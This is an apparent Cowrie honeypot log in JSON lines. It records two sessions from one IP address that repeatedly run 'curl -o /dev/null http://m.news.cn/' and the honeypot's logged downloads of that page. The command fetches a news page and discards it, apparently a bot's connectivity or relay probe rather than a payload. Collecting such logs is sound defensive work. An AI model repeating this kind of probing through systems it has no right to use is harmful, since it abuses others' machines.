{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.108573Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.110128Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.141921Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.143518Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.163586Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.165139Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.185217Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.186854Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.209079Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.210431Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.228339Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.229759Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.253657Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.255154Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.256260Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.260217Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.264915Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.268391Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.271472Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.272549Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.283041Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.297025Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.298685Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.315247Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.317913Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.319304Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.329499Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.343741Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.344703Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.360387Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.361738Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.377950Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.391669Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.393181Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.408030Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.409425Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.410933Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.430311Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.432601Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.439298Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.440716Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.453741Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.454988Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.464976Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.491308Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.494761Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.495853Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.502912Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.504204Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.544801Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.546413Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.551729Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.553173Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.589318Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.595753Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.596956Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.603051Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.606443Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.607996Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.614315Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.639212Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.644481Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.645720Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.648831Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.653430Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.654579Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.684683Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.686104Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.689902Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.690638Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.725028Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.726761Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.731472Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.732917Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.737852Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.766551Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.767779Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.787405Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.791707Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.793610Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.794420Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.795438Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.805022Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.819280Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.820662Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.829151Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
